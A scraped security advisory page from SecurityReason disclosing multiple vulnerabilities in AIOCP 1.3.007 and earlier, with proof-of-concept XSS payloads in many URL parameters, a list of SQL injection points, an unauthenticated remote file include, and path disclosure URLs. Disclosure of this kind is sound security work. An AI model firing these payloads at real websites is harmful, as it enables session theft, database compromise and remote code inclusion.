|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1839 CVE : CVE-2006-5832 CVE : CVE-2006-5831 CVE : CVE-2006-5830 CVE : CVE-2006-5829 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : aurent gaffié & benjamin mossé Published : 10.11.2006
Advisory Content : AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] XSS get = - /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>ale rt(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s cript>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</texta rea>'"><script>alert(document.cookie)</script> - /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(d ocument.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s cript>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textar ea>'"><script>alert(document.cookie)</script> - /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>a lert(document.cookie)</script> - /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert (document.cookie)</script> - /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(do cument.cookie)</script> xss post in user profile : - signature - fiscal code remote file include = /admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include ) sql injection = - /public/code/cp_dpage.php?choosed_language=[sql] - /public/code/cp_news.php?choosed_language=[sql] - /public/code/cp_news.php?news_category=[sql] - /public/code/cp_forum_view.php?choosed_language=[sql] - /public/code/cp_edit_user.php?choosed_language=[sql] - /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql] - /public/code/cp_newsletter.php?choosed_language=[sql] - /public/code/cp_links.php?links_category=[sql] - /public/code/cp_links.php?choosed_language=[sql] - /public/code/cp_contact_us.php?choosed_language=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?order_field=[sql] - /public/code/cp_login.php?choosed_language=[sql] - /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted= 1&firstrow=[sql] - /public/code/cp_codice_fiscale.php?choosed_language=[sql] - /public/code/cp_links_search.php?orderdir=[sql] full path disclosure = - /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main - /public/code/cp_show_ec_products.php?order_field[]= - /public/code/cp_show_page_help.php?hp[]= global risk = hight laurent gaffié & benjamin mossé http://s-a-p.ca/ saps.audit (at) gmail (dot) com [email concealed]  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |